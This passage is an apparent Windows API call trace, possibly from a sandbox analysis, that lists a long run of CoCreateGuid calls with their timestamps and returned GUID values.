pguid=0x755f394 | out: pguid=0x755f394*(Data1=0xd7a85336, Data2=0xf811, Data3=0x47fb, Data4=([0]=0x9f, [1]=0x15, [2]=0xea, [3]=0x24, [4]=0x79, [5]=0x27, [6]=0xd7, [7]=0x46))) returned 0x0 [0144.981] CoCreateGuid (in: pguid=0x755f394 | out: pguid=0x755f394*(Data1=0xca756b4b, Data2=0xf2a5, Data3=0x4e20, Data4=([0]=0x92, [1]=0xb0, [2]=0x89, [3]=0x66, [4]=0xd1, [5]=0x29, [6]=0x5c, [7]=0xd2))) returned 0x0 [0144.985] CoCreateGuid (in: pguid=0x755f394 | out: pguid=0x755f394*(Data1=0x28213875, Data2=0x208e, Data3=0x455f, Data4=([0]=0xa5, [1]=0xe4, [2]=0xa4, [3]=0xaf, [4]=0x4f, [5]=0x5c, [6]=0x57, [7]=0x34))) returned 0x0 [0144.990] CoCreateGuid (in: pguid=0x755f394 | out: pguid=0x755f394*(Data1=0xe2b20df2, Data2=0x3415, Data3=0x42cd, Data4=([0]=0x97, [1]=0x8a, [2]=0x29, [3]=0xe4, [4]=0x30, [5]=0xbb, [6]=0x69, [7]=0xf0))) returned 0x0 [0144.997] CoCreateGuid (in: pguid=0x755f394 | out: pguid=0x755f394*(Data1=0xf91c2ef9, Data2=0x7672, Data3=0x4f53, Data4=([0]=0x9e, [1]=0xc5, [2]=0x87, [3]=0x85, [4]=0x16, [5]=0xb9, [6]=0x86, [7]=0x28))) returned 0x0 [0145.001] CoCreateGuid (in: pguid=0x755f394 | out: pguid=0x755f394*(Data1=0x7b728803, Data2=0x5924, Data3=0x44b7, Data4=([0]=0x84, [1]=0x9c, [2]=0x2c, [3]=0x33, [4]=0x42, [5]=0x3f, [6]=0xf, [7]=0xf5))) returned 0x0 [0145.007] CoCreateGuid (in: pguid=0x755f394 | out: pguid=0x755f394*(Data1=0x935654f1, Data2=0x1cda, Data3=0x453d, Data4=([0]=0x9b, [1]=0xa9, [2]=0xb4, [3]=0x4e, [4]=0x41, [5]=0x90, [6]=0x89, [7]=0x1b))) returned 0x0 [0145.015] CoCreateGuid (in: pguid=0x755f394 | out: pguid=0x755f394*(Data1=0x34fbb693, Data2=0xbd13, Data3=0x4a47, Data4=([0]=0xb6, [1]=0x33, [2]=0x1, [3]=0x1d, [4]=0xc2, [5]=0x32, [6]=0xe0, [7]=0x50))) returned 0x0 [0145.146] CoCreateGuid (in: pguid=0x755f394 | out: pguid=0x755f394*(Data1=0xe3b19d8f, Data2=0x42af, Data3=0x4a1e, Data4=([0]=0xa2, [1]=0xe1, [2]=0xf7, [3]=0x13, [4]=0xf, [5]=0xfd, [6]=0x6c, [7]=0xca))) returned 0x0 [0145.151] CoCreateGuid (in: pguid=0x755f394 | out: pguid=0x755f394*(Data1=0x6bcc3545, Data2=0x5de3, Data3=0x45ef, Data4=([0]=0x97, [1]=0x2e, [2]=0x4f, [3]=0xae, [4]=0xc0, [5]=0xdd, [6]=0xdd, [7]=0xfa))) returned 0x0 [0145.153] CoCreateGuid (in: pguid=0x755f394 | out: pguid=0x755f394*(Data1=0x2a9455ee, Data2=0x41b7, Data3=0x43dd, Data4=([0]=0x9d, [1]=0x8a, [2]=0x37, [3]=0xd1, [4]=0xa1, [5]=0x16, [6]=0xff, [7]=0xa))) returned 0x0 [0145.154] CoCreateGuid (in: pguid=0x755f394 | out: pguid=0x755f394*(Data1=0xb45e5d46, Data2=0x4fed, Data3=0x42e6, Data4=([0]=0xa1, [1]=0xb4, [2]=0x16, [3]=0xc, [4]=0xb9, [5]=0x2f, [6]=0x94, [7]=0x76))) returned 0x0 [0145.155] CoCreateGuid (in: pguid=0x755f394 | out: pguid=0x755f394*(Data1=0x2b5b6db6, Data2=0xc538, Data3=0x4423, Data4=([0]=0xb4, [1]=0xbc, [2]=0x5f, [3]=0x88, [4]=0xa7, [5]=0x78, [6]=0x38, [7]=0x37))) returned 0x0 [0145.156] CoCreateGuid (in: pguid=0x755f394 | out: pguid=0x755f394*(Data1=0xfa08d971, Data2=0x2790, Data3=0x40f8, Data4=([0]=0x95, [1]=0x42, [2]=0xc2, [3]=0xe0, [4]=0xaf, [5]=0x6a, [6]=0x59, [7]=0xc2))) returned 0x0 [0145.158] CoCreateGuid (in: pguid=0x755f394 | out: pguid=0x755f394*(Data1=0x906e6f63, Data2=0x79c5, Data3=0x4bec, Data4=([0]=0xbd, [1]=0x2c, [2]=0x47, [3]=0xaa, [4]=0x22, [5]=0x44, [6]=0x5a, [7]=0x86))) returned 0x0 [0145.159] CoCreateGuid (in: pguid=0x755f394 | out: pguid=0x755f394*(Data1=0x7934ea10, Data2=0x55f4, Data3=0x4d53, Data4=([0]=0x84, [1]=0xbd, [2]=0x87, [3]=0x8f, [4]=0x8b, [5]=0xb3, [6]=0xae, [7]=0x9))) returned 0x0 [0145.367] CoCreateGuid (in: pguid=0x755f394 | out: pguid=0x755f394*(Data1=0x7f44d4a6, Data2=0x3252, Data3=0x4591, Data4=([0]=0xaf, [1]=0xbc, [2]=0x56, [3]=0xfe, [4]=0xc6, [5]=0x80, [6]=0x13, [7]=0x6b))) returned 0x0 [0145.367] CoCreateGuid (in: pguid=0x755f394 | out: pguid=0x755f394*(Data1=0x88eb4b71, Data2=0x637a, Data3=0x42ec, Data4=([0]=0xb7, [1]=0x71, [2]=0xaf, [3]=0xf0, [4]=0xaf, [5]=0xa1, [6]=0x5b, [7]=0xc1))) returned 0x0 [0145.368] CoCreateGuid (in: pguid=0x755f394 | out: pguid=0x755f394*(Data1=0x32a2151, Data2=0xa35a, Data3=0x41d4, Data4=([0]=0x83, [1]=0xd9, [2]=0xd1, [3]=0x76, [4]=0x6d, [5]=0x79, [6]=0x82, [7]=0xb9))) returned 0x0 [0145.369] CoCreateGuid (in: pguid=0x755f394 | out: pguid=0x755f394*(Data1=0xf29755bc, Data2=0x167c, Data3=0x4118, Data4=([0]=0x95, [1]=0x6a, [2]=0x1c, [3]=0xef, [4]=0x6e, [5]=0x36, [6]=0xf4, [7]=0x74))) returned 0x0 [0145.370] CoCreateGuid (in: pguid=0x755f394 | out: pguid=0x755f394*(Data1=0xd241f409, Data2=0x1a5c, Data3=0x4a75, Data4=([0]=0x86, [1]=0x9b, [2]=0x67, [3]=0x2, [4]=0xdf, [5]=0xfc, [6]=0xba, [7]=0xca))) returned 0x0 [0145.815] CoCreateGuid (in: pguid=0x755f394 | out: pguid=0x755f394*(Data1=0x3ed69f29, Data2=0x5420, Data3=0x4a0b, Data4=([0]=0x83, [1]=0x43, [2]=0xde, [3]=0x7, [4]=0x5, [5]=0xfb, [6]=0xee, [7]=0x64))) returned 0x0 [0145.821] CoCreateGuid (in: pguid=0x755f394 | out: pguid=0x755f394*(Data1=0x45cd5a62, Data2=0x76d0, Data3=0x42f5, Data4=([0]=0xbd, [1]=0x70, [2]=0x11, [3]=0x31, [4]=0x68, [5]=0x3b, [6]=0x9a, [7]=0xb7))) returned 0x0 [0145.830] CoCreateGuid (in: pguid=0x755f394 | out: pguid=0x755f394*(Data1=0xc5f64986, Data2=0xeb1, Data3=0x4075, Data4=([0]=0x94, [1]=0x3c, [2]=0xed, [3]=0x25, [4]=0x9c, [5]=0x5f, [6]=0x12, [7]=0x35))) returned 0x0 [0145.839] CoCreateGuid (in: pguid=0x755f394 | out: pguid=0x755f394*(Data1=0x370e485c, Data2=0x8bb5, Data3=0x4057, Data4=([0]=0xb6, [1]=0xb9, [2]=0x87, [3]=0x3d, [4]=0x6, [5]=0xf3, [6]=0x73, [7]=0x8b))) returned 0x0 [0145.843] CoCreateGuid (in: pguid=0x755f394 | out: pguid=0x755f394*(Data1=0x3cbe0470, Data2=0xd002, Data3=0x4e7d, Data4=([0]=0xb1, [1]=0xff, [2]=0x29, [3]=0xb2, [4]=0xa, [5]=0xa2, [6]=0x16, [7]=0x4a))) returned 0x0 [0145.954] CoCreateGuid (in: pguid=0x755f394 | out: pguid=0x755f394*(Data1=0xc535653c, Data2=0xe4df, Data3=0x40d1, Data4=([0]=0xa0, [1]=0x1b, [2]=0x8a, [3]=0x7f, [4]=0xae, [5]=0xe8, [6]=0x38, [7]=0xce))) returned 0x0 [0145.958] CoCreateGuid (in: pguid=0x755f394 | out: pguid=0x755f394*(Data1=0x6e9717b1, Data2=0xd849, Data3=0x4d1d, Data4=([0]=0x8e, [1]=0x4e, [2]=0x24, [3]=0xd9, [4]=0xb6, [5]=0x83, [6]=0x6, [7]=0x36))) returned 0x0 [0145.961] CoCreateGuid (in: pguid=0x755f394 | out: pguid=0x755f394*(Data1=0x47e3537c, Data2=0x120f, Data3=0x4536, Data4=([0]=0xbf, [1]=0x99, [2]=0x20, [3]=0xf6, [4]=0x64, [5]=0x5f, [6]=0x72, [7]=0x50))) returned 0x0 [0145.962] CoCreateGuid (in: pguid=0x755f394 | out: pguid=0x755f394*(Data1=0x6d1076c1, Data2=0xf2a0, Data3=0x4992, Data4=([0]=0x9c, [1]=0x16, [2]=0xf8, [3]=0x25, [4]=0x4, [5]=0x46, [6]=0x5d, [7]=0x8a))) returned 0x0 [0145.964] CoCreateGuid (in: pguid=0x755f394 | out: pguid=0x755f394*(Data1=0xaf61c250, Data2=0x8885, Data3=0x421c, Data4=([0]=0xa4, [1]=0x73, [2]=0xb6, [3]=0x96, [4]=0xdb, [5]=0x6a, [6]=0xd6, [7]=0x4d))) returned 0x0 [0145.965] CoCreateGuid (in: pguid=0x755f394 | out: pguid=0x755f394*(Data1=0xcd7705f9, Data2=0x434d, Data3=0x44bd, Data4=([0]=0x9d, [1]=0x75, [2]=0xb8, [3]=0x15, [4]=0xc9, [5]=0xca, [6]=0xdb, [7]=0x1f))) returned 0x0 [0145.966] CoCreateGuid (in: pguid=0x755f394 | out: pguid=0x755f394*(Data1=0xc7ba836b, Data2=0xae1, Data3=0x4721, Data4=([0]=0x98, [1]=0xbb, [2]=0x4a, [3]=0x22, [4]=0x21, [5]=0x60, [6]=0xb5, [7]=0x60))) returned 0x0 [0145.967] CoCreateGuid (in: pguid=0x755f394 | out: pguid=0x755f394*(Data1=0x98408058, Data2=0xdad3, Data3=0x4cea, Data4=([0]=0x95, [1]=0x14, [2]=0x9e, [3]=0x21, [4]=0x1, [5]=0x0, [6]=0xd4, [7]=0x5d))) returned 0x0 [0145.968] CoCreateGuid (in: pguid=0x755f394 | out: pguid=0x755f394*(Data1=0x8c45e7d3, Data2=0xda62, Data3=0x47d8, Data4=([0]=0x8f, [1]=0xac, [2]=0x98, [3]=0xb, [4]=0x9f, [5]=0x35, [6]=0xd1, [7]=0xee))) returned 0x0 [0145.969] CoCreateGuid (in: pguid=0x755f394 | out: pguid=0x755f394*(Data1=0xa3d17f5, Data2=0xeb43, Data3=0x4eb5, Data4=([0]=0xa9, [1]=0xe0, [2]=0x99, [3]=0x54, [4]=0x28, [5]=0x6a, [6]=0x45, [7]=0x8c))) returned 0x0 [0145.970] CoCreateGuid (in: pguid=0x755f394 | out: pguid=0x755f394*(Data1=0x77abfc, Data2=0x96dd, Data3=0x496f, Data4=([0]=0xad, [1]=0xf1, [2]=0x8c, [3]=0xbd, [4]=0xdf, [5]=0x55, [6]=0xc7, [7]=0x38))) returned 0x0 [0145.971] CoCreateGuid (in: pguid=0x755f394 | out: pguid=0x755f394*(Data1=0x43e0214a, Data2=0x363d, Data3=0x4056, Data4=([0]=0xb8, [1]=0x9f, [2]=0x90, [3]=0xfd, [4]=0xe7, [5]=0x14, [6]=0xb4, [7]=0x49))) returned 0x0 [0145.972] CoCreateGuid (in: pguid=0x755f394 | out: pguid=0x755f394*(Data1=0x7971d5ef, Data2=0x5bff, Data3=0x4bdf, Data4=([0]=0xa0, [1]=0x55, [2]=0x46, [3]=0x93, [4]=0xd5, [5]=0xad, [6]=0x34, [7]=0xf4))) returned 0x0 [0145.973] CoCreateGuid (in: pguid=0x755f394 | out: pguid=0x755f394*(Data1=0x235c818b, Data2=0xe565, Data3=0x4039, Data4=([0]=0x99, [1]=0x40, [2]=0x14, [3]=0x8e, [4]=0xf5, [5]=0xa0, [6]=0xca, [7]=0x1c))) returned 0x0 [0145.974] CoCreateGuid (in: pguid=0x755f394 | out: pguid=0x755f394*(Data1=0x6d304a67, Data2=0xe8cf, Data3=0x44f9, Data4=([0]=0x80, [1]=0xe0, [2]=0x81, [3]=0x78, [4]=0xa8, [5]=0xd6, [6]=0x5e, [7]=0xbd))) returned 0x0 [0145.975] CoCreateGuid (in: pguid=0x755f394 | out: pguid=0x755f394*(Data1=0x39cc6e3a, Data2=0xfee0, Data3=0x4a52, Data4=([0]=0x97, [1]=0x19, [2]=0x72, [3]=0xd6, [4]=0x4d, [5]=0x7, [6]=0xa6, [7]=0x99))) returned 0x0 [0145.976] CoCreateGuid (in: pguid=0x755f394 | out: pguid=0x755f394*(Data1=0xd710fce9, Data2=0x2d6d, Data3=0x4559, Data4=([0]=0x93, [1]=0x30, [2]=0x3, [3]=0xe, [4]=0x84, [5]=0x5, [6]=0xff, [7]=0x3b))) returned 0x0 [0145.977] CoCreateGuid (in: pguid=0x755f394 | out: pguid=0x755f394*(Data1=0x77be5a81, Data2=0xdedc, Data3=0x4e7d, Data4=([0]=0xa7, [1]=0x35, [2]=0x23, [3]=0x3b, [4]=0x1e, [5]=0xd4, [6]=0x15, [7]=0x59))) returned 0x0 [0145.977] CoCreateGuid (in: pguid=0x755f394 | out: pguid=0x755f394*(Data1=0x495cf9de, Data2=0xec29, Data3=0x4aa6, Data4=([0]=0x97, [1]=0x8d, [2]=0x4e, [3]=0xce, [4]=0xc7, [5]=0xca, [6]=0x18, [7]=0xf2))) returned 0x0 [0145.978] CoCreateGuid (in: pguid=0x755f394 | out: pguid=0x755f394*(Data1=0xda85abd, Data2=0x322f, Data3=0x4b75, Data4=([0]=0x9b, [1]=0xf4, [2]=0xd1, [3]=0xce, [4]=0x60, [5]=0x62, [6]=0x93, [7]=0x95))) returned 0x0 [0145.982] CoCreateGuid (in: pguid=0x755f394 | out: pguid=0x755f394*(Data1=0x8e6059ba, Data2=0xdeb5, Data3=0x4bcd, Data4=([0]=0xb8, [1]=0x6c, [2]=0xf7, [3]=0x62, [4]=0xf, [5]=0xc, [6]=0x9a, [7]=0xe8))) returned 0x0 [0145.984] CoCreateGuid (in: pguid=0x755f394 | out: pguid=0x755f394*(Data1=0x2180097e, Data2=0xd28f, Data3=0x481c, Data4=([0]=0x83, [1]=0x13, [2]=0x95, [3]=0x18, [4]=0xbf, [5]=0xfa, [6]=0x16, [7]=0x3f))) returned 0x0 [0146.076] CoCreateGuid (in: pguid=0x755f394 | out: pguid=0x755f394*(Data1=0x5ed0c32f, Data2=0x7e2b, Data3=0x4bde, Data4=([0]=0x94, [1]=0x8f, [2]=0x62, [3]=0xf7, [4]=0x2, [5]=0xdc, [6]=0xa3, [7]=0x1a))) returned 0x0 [0146.078] CoCreateGuid (in: pguid=0x755f394 | out: pguid=0x755f394*(Data1=0xc3d6a164, Data2=0x489d, Data3=0x484c, Data4=([0]=0x8e, [1]=0xf, [2]=0x9b, [3]=0x98, [4]=0x8f, [5]=0x68, [6]=0x8b, [7]=0xe2))) returned 0x0 [0146.079] CoCreateGuid (in: pguid=0x755f394 | out: pguid=0x755f394*(Data1=0x50e1c51c, Data2=0x924d, Data3=0x4de5, Data4=([0]=0x98, [1]=0x5b, [2]=0xa8, [3]=0x1c, [4]=0x3a, [5]=0xa4, [6]=0x53, [7]=0x8c))) returned 0x0 [0146.081] CoCreateGuid (in: pguid=0x755f394 | out: pguid=0x755f394*(Data1=0x3eed0ea4, Data2=0x6487, Data3=0x4493, Data4=([0]=0xae, [1]=0x3d, [2]=0xd0, [3]=0xd6, [4]=0xce, [5]=0x26, [6]=0x2a, [7]=0xf1))) returned 0x0 [0146.082] CoCreateGuid (in: pguid=0x755f394 | out: pguid=0x755f394*(Data1=0x46f0d554, Data2=0xeca9, Data3=0x4ff4, Data4=([0]=0xaf, [1]=0x90, [2]=0xbd, [3]=0xc0, [4]=0xbf, [5]=0x39, [6]=0xb8, [7]=0xab))) returned 0x0 [0146.082] CoCreateGuid (in: pguid=0x755f394 | out: pguid=0x755f394*(Data1=0x2be71821, Data2=0xa438, Data3=0x42c0, Data4=([0]=0x9f, [1]=0xd6, [2]=0xbd, [3]=0xe5, [4]=0xed, [5]=0x5, [6]=0x13, [7]=0xb))) returned 0x0 [0146.083] CoCreateGuid (in: pguid=0x755f394 | out: pguid=0x755f394*(Data1=0xc8da488c, Data2=0xa2, Data3=0x4984, Data4=([0]=0xab, [1]=0xd4, [2]=0x53, [3]=0xed, [4]=0x5c, [5]=0x34, [6]=0x20, [7]=0xf4))) returned 0x0 [0146.085] CoCreateGuid (in: pguid=0x755f394 | out: pguid=0x755f394*(Data1=0xc9b7ffb1, Data2=0x4c70, Data3=0x46aa, Data4=([0]=0x85, [1]=0x78, [2]=0xd6, [3]=0x4f, [4]=0x35, [5]=0x95, [6]=0x62, [7]=0xbd))) returned 0x0 [0146.470] CoCreateGuid (in: pguid=0x755f394 | out: pguid=0x755f394*(Data1=0x2bbb901f, Data2=0x4136, Data3=0x43d5, Data4=([0]=0xa5, [1]=0x9f, [2]=0xf7, [3]=0x81, [4]=0xbc, [5]=0x26, [6]=0xca, [7]=0x7))) returned 0x0 [0146.475] CoCreateGuid (in: pguid=0x755f394 | out: pguid=0x755f394*(Data1=0xcb419e34, Data2=0x5a3f, Data3=0x45e0, Data4=([0]=0xa2, [1]=0x56, [2]=0x7a, [3]=0x6f, [4]=0x1c, [5]=0x49, [6]=0xb9, [7]=0xcb))) returned 0x0 [0146.598] CoCreateGuid (in: pguid=0x755f394 | out: pguid=0x755f394*(Data1=0x9294001d, Data2=0xb966, Data3=0x4a80, Data4=([0]=0xbb, [1]=0x3a, [2]=0xbb, [3]=0x73, [4]=0xbe, [5]=0xc, [6]=0x6d, [7]=0x77))) returned 0x0 [0146.600] CoCreateGuid (in: pguid=0x755f394 | out: pguid=0x755f394*(Data1=0x284f0def, Data2=0xcd30, Data3=0x4789, Data4=([0]=0xae, [1]=0x85, [2]=0xba, [3]=0xc9, [4]=0x7, [5]=0xf9, [6]=0x28, [7]=0x62))) returned 0x0 [0146.603] CoCreateGuid (in: pguid=0x755f394 | out: pguid=0x755f394*(Data1=0x727b3177, Data2=0x4f26, Data3=0x4bf9, Data4=([0]=0xae, [1]=0x81, [2]=0x97, [3]=0x60, [4]=0xdc, [5]=0x2f, [6]=0x7b, [7]=0x4d))) returned 0x0 [0146.614] CoCreateGuid (in: pguid=0x755f394 | out: pguid=0x755f394*(Data1=0xf4731e3a, Data2=0x51b8, Data3=0x4519, Data4=([0]=0x8a, [1]=0xc1, [2]=0xec, [3]=0xef, [4]=0x37, [5]=0xf0, [6]=0xb1, [7]=0x38))) returned 0x0 [0146.615] CoCreateGuid (in: pguid=0x755f394 | out: pguid=0x755f394*(Data1=0x99c67ef5, Data2=0x4cd1, Data3=0x4eb9, Data4=([0]=0xa0, [1]=0xfa, [2]=0xe1, [3]=0x89, [4]=0x25, [5]=0x23, [6]=0x55, [7]=0x39))) returned 0x0 [0146.617] CoCreateGuid (in: pguid=0x755f394 | out: pguid=0x755f394*(Data1=0x6f54717a, Data2=0x548a, Data3=0x4c5e, Data4=([0]=0x93, [1]=0x50, [2]=0xd6, [3]=0x11, [4]=0xb4, [5]=0x39, [6]=0xcb, [7]=0x7d))) returned 0x0 [0146.617] CoCreateGuid (in: pguid=0x755f394 | out: pguid=0x755f394*(Data1=0xe9704d43, Data2=0x72a4, Data3=0x4e49, Data4=([0]=0xb4, [1]=0x5e, [2]=0x6, [3]=0x65, [4]=0xfb, [5]=0xfd, [6]=0x3, [7]=0xed))) returned 0x0 [0146.620] CoCreateGuid (in: pguid=0x755f394 | out: pguid=0x755f394*(Data1=0x40a00a6a, Data2=0x604a, Data3=0x4faa, Data4=([0]=0xa0, [1]=0xa7, [2]=0x62, [3]=0xe7, [4]=0x73, [5]=0xdc, [6]=0xad, [7]=0x40))) returned 0x0 [0146.620] CoCreateGuid (in: pguid=0x755f394 | out: pguid=0x755f394*(Data1=0x4212b19c, Data2=0x45d0, Data3=0x47c6, Data4=([0]=0x8e, [1]=0x88, [2]=0xb8, [3]=0xf5, [4]=0x99, [5]=0x34, [6]=0xdb, [7]=0xcf))) returned 0x0 [0146.623] CoCreateGuid (in: pguid=0x755f394 | out: pguid=0x755f394*(Data1=0x88d4b3a7, Data2=0x1a39, Data3=0x41f3, Data4=([0]=0xb5, [1]=0xa0, [2]=0x35, [3]=0x3a, [4]=0x24, [5]=0x49, [6]=0xe1, [7]=0x77))) returned 0x0 [0146.623] CoCreateGuid (in: pguid=0x755f394 | out: pguid=0x755f394*(Data1=0xc03322ce, Data2=0xbdbc, Data3=0x48ee, Data4=([0]=0xbc, [1]=0x30, [2]=0x5, [3]=0x98, [4]=0xd4, [5]=0x46, [6]=0x3c, [7]=0xc5))) returned 0x0 [0146.624] CoCreateGuid (in: pguid=0x755f394 | out: pguid=0x755f394*(Data1=0x89a098ec, Data2=0xc111, Data3=0x4a2e, Data4=([0]=0xb4, [1]=0x78, [2]=0x5e, [3]=0xd5, [4]=0x97, [5]=0x40, [6]=0x74, [7]=0x4a))) returned 0x0 [0146.625] CoCreateGuid (in: pguid=0x755f394 | out: pguid=0x755f394*(Data1=0xcecb5756, Data2=0x3db, Data3=0x47fd, Data4=([0]=0x8a, [1]=0x9c, [2]=0x32, [3]=0x1d, [4]=0x3b, [5]=0x7d, [6]=0x5c, [7]=0xd3))) returned 0x0 [0146.627] CoCreateGuid (in: pguid=0x755f394 | out: pguid=0x755f394*(Data1=0x94c4d041, Data2=0x42d0, Data3=0x4893, Data4=([0]=0x9f, [1]=0xd7, [2]=0x54, [3]=0x7d, [4]=0x2f, [5]=0xde, [6]=0x1f, [7]=0x4))) returned 0x0 [0146.628] CoCreateGuid (in: pguid=0x755f394 | out: pguid=0x755f394*(Data1=0x2b68502, Data2=0xb1e6, Data3=0x4dbe, Data4=([0]=0x9f, [1]=0x3a, [2]=0x86, [3]=0x94, [4]=0x99, [5]=0x5e, [6]=0x89, [7]=0x85))) returned 0x0 [0146.629] CoCreateGuid (in: pguid=0x755f394 | out: pguid=0x755f394*(Data1=0x92cbae56, Data2=0x5331, Data3=0x4299, Data4=([0]=0x80, [1]=0x41, [2]=0xcd, [3]=0xe5, [4]=0xce, [5]=0x96, [6]=0x23, [7]=0x18))) returned 0x0 [0146.631] CoCreateGuid (in: pguid=0x755f394 | out: pguid=0x755f394*(Data1=0x4eb917c8, Data2=0x16fc, Data3=0x4596, Data4=([0]=0x9a, [1]=0x89, [2]=0xd4, [3]=0x50, [4]=0x56, [5]=0xb3, [6]=0x60, [7]=0x40))) returned 0x0 [0146.632] CoCreateGuid (in: pguid=0x755f394 | out: pguid=0x755f394*(Data1=0x513c6602, Data2=0xce8a, Data3=0x40a9, Data4=([0]=0xbc, [1]=0xf, [2]=0x7a, [3]=0xf, [4]=0x42, [5]=0x82, [6]=0xf3, [7]=0xc3))) returned 0x0 [0146.634] CoCreateGuid (in: pguid=0x755f394 | out: pguid=0x755f394*(Data1=0x681b7296, Data2=0xa36f, Data3=0x4712, Data4=([0]=0xad, [1]=0xc, [2]=0x3a, [3]=0xa1, [4]=0xa6, [5]=0xa1, [6]=0x19, [7]=0xe0))) returned 0x0 [0146.634] CoCreateGuid (in: pguid=0x755f394 | out: pguid=0x755f394*(Data1=0x55162d9, Data2=0xf045, Data3=0x4847, Data4=([0]=0x80, [1]=0x8c, [2]=0x47, [3]=0x91, [4]=0x86, [5]=0x32, [6]=0x62, [7]=0x4e))) returned 0x0 [0146.634] CoCreateGuid (in: pguid=0x755f394 | out: pguid=0x755f394*(Data1=0x7aebbec0, Data2=0xafd4, Data3=0x4e4d, Data4=([0]=0x9f, [1]=0xe, [2]=0xe3, [3]=0x46, [4]=0x24, [5]=0x1a, [6]=0xc4, [7]=0xbc))) returned 0x0 [0146.635] CoCreateGuid (in: pguid=0x755f394 | out: pguid=0x755f394*(Data1=0x57b711bf, Data2=0xe537, Data3=0x43de, Data4=([0]=0x9b, [1]=0xd5, [2]=0x94, [3]=0x42, [4]=0x1e, [5]=0xa8, [6]=0x27, [7]=0x3c))) returned 0x0 [0146.635] CoCreateGuid (in: pguid=0x755f394 | out: pguid=0x755f394*(Data1=0x263840db, Data2=0xe682, Data3=0x4894, Data4=([0]=0xbe, [1]=0xb7, [2]=0xe5, [3]=0x89, [4]=0xa0, [5]=0xbb, [6]=0xde, [7]=0x59))) returned 0x0 [0146.754] CoCreateGuid (in: pguid=0x755f394 | out: pguid=0x755f394*(Data1=0xe2a981d4, Data2=0xca94, Data3=0x48a7, Data4=([0]=0x9f, [1]=0x17, [2]=0xe0, [3]=0xfc, [4]=0xc1, [5]=0x9f, [6]=0xb1, [7]=0xe5))) returned 0x0 [0146.755] CoCreateGuid (in: pguid=0x755f394 | out: pguid=0x755f394*(Data1=0xd241027a, Data2=0xa2ed, Data3=0x454c, Data4=([0]=0xa8, [1]=0xa2, [2]=0xeb, [3]=0xdc, [4]=0x9a, [5]=0xc2, [6]=0x4a, [7]=0x58))) returned 0x0 [0146.756] CoCreateGuid (in: pguid=0x755f394 | out: pguid=0x755f394*(Data1=0xc027ff85, Data2=0x8801, Data3=0x4c64, Data4=([0]=0xb3, [1]=0xd0, [2]=0xc4, [3]=0x37, [4]=0xbd, [5]=0x5d, [6]=0xb1, [7]=0x9a))) returned 0x0 [0146.756] CoCreateGuid (in: pguid=0x755f394 | out: pguid=0x755f394*(Data1=0xdb5c0015, Data2=0xe2ae, Data3=0x4e4b, Data4=([0]=0x9c, [1]=0x62, [2]=0x1f, [3]=0xeb, [4]=0xbc, [5]=0xbb, [6]=0x79, [7]=0x27))) returned 0x0 [0146.757] CoCreateGuid (in: pguid=0x755f394 | out: pguid=0x755f394*(Data1=0x49805932, Data2=0xb963, Data3=0x48ef, Data4=([0]=0x9e, [1]=0x71, [2]=0x5, [3]=0x98, [4]=0x81, [5]=0x1a, [6]=0xbf, [7]=0x5e))) returned 0x0 [0146.757] CoCreateGuid (in: pguid=0x755f394 | out: pguid=0x755f394*(Data1=0xb58dadfb, Data2=0xa6f6, Data3=0x4700, Data4=([0]=0x85, [1]=0x70, [2]=0x33, [3]=0x7f, [4]=0x91, [5]=0x65, [6]=0xec, [7]=0x3a))) returned 0x0 [0146.758] CoCreateGuid (in: pguid=0x755f394 | out: pguid=0x755f394*(Data1=0x58cf7c41, Data2=0xd470, Data3=0x445a, Data4=([0]=0x9f, [1]=0x0, [2]=0x32, [3]=0x24, [4]=0x4b, [5]=0x57, [6]=0xe2, [7]=0x6f))) returned 0x0 [0146.759] CoCreateGuid (in: pguid=0x755f394 | out: pguid=0x755f394*(Data1=0xf86a4e51, Data2=0x4cca, Data3=0x4ecd, Data4=([0]=0x93, [1]=0xa9, [2]=0x2d, [3]=0x29, [4]=0x36, [5]=0x5b, [6]=0xc8, [7]=0x0))) returned 0x0 [0146.760] CoCreateGuid (in: pguid=0x755f394 | out: pguid=0x755f394*(Data1=0xa95148ea, Data2=0xd532, Data3=0x41b6, Data4=([0]=0x80, [1]=0x99, [2]=0x8e, [3]=0x44, [4]=0x15, [5]=0xd8, [6]=0xf1, [7]=0xef))) returned 0x0 [0146.760] CoCreateGuid (in: pguid=0x755f394 | out: pguid=0x755f394*(Data1=0x19580eae, Data2=0xaedb, Data3=0x4ab2, Data4=([0]=0xac, [1]=0xf9, [2]=0x37, [3]=0x82, [4]=0x98, [5]=0x43, [6]=0xae, [7]=0x6e))) returned 0x0 [0146.761] CoCreateGuid (in: pguid=0x755f394 | out: pguid=0x755f394*(Data1=0xfbc48d04, Data2=0x327d, Data3=0x4910, Data4=([0]=0xb8, [1]=0x74, [2]=0xd9, [3]=0xf4, [4]=0x69, [5]=0x39, [6]=0x7f, [7]=0xa7))) returned 0x0 [0146.762] CoCreateGuid (in: pguid=0x755f394 | out: pguid=0x755f394*(Data1=0xb301331, Data2=0x4feb, Data3=0x43cf, Data4=([0]=0xbb, [1]=0xa0, [2]=0xde, [3]=0x83, [4]=0x81, [5]=0xa5, [6]=0x5f, [7]=0x4b))) returned 0x0 [0146.765] CoCreateGuid (in: pguid=0x755f394 | out: pguid=0x755f394*(Data1=0x7fe492fd, Data2=0x6632, Data3=0x41e0, Data4=([0]=0x8b, [1]=0x3d, [2]=0x3e, [3]=0x52, [4]=0x9f, [5]=0xd9, [6]=0xf3, [7]=0x61))) returned 0x0 [0146.766] CoCreateGuid (in: pguid=0x755f394 | out: pguid=0x755f394*(Data1=0xdda18229, Data2=0x37e0, Data3=0x4ea1, Data4=([0]=0xa6, [1]=0x3b, [2]=0x7f, [3]=0xe5, [4]=0x79, [5]=0xc2, [6]=0x6a, [7]=0xb9))) returned 0x0 [0146.770] CoCreateGuid (in: pguid=0x755f394 | out: pguid=0x755f394*(Data1=0x1eb102cd, Data2=0xcc4b, Data3=0x4b5e, Data4=([0]=0x9b, [1]=0xdc, [2]=0xca, [3]=0xbc, [4]=0x64, [5]=0x24, [6]=0x0, [7]=0x4e))) returned 0x0 [0146.772] CoCreateGuid (in: pguid=0x755f394 | out: pguid=0x755f394*(Data1=0x5fd32c4f, Data2=0x5b8c, Data3=0x4229, Data4=([0]=0x92, [1]=0x2e, [2]=0x7d, [3]=0xd3, [4]=0x30, [5]=0xec, [6]=0x19, [7]=0xf4))) returned 0x0 [0146.773] CoCreateGuid (in: pguid=0x755f394 | out: pguid=0x755f394*(Data1=0x1c25bdc7, Data2=0x53a0, Data3=0x472e, Data4=([0]=0x99, [1]=0x41, [2]=0xea, [3]=0xbd, [4]=0x8d, [5]=0x3b, [6]=0x31, [7]=0x3))) returned 0x0 [0146.773] CoCreateGuid (in: 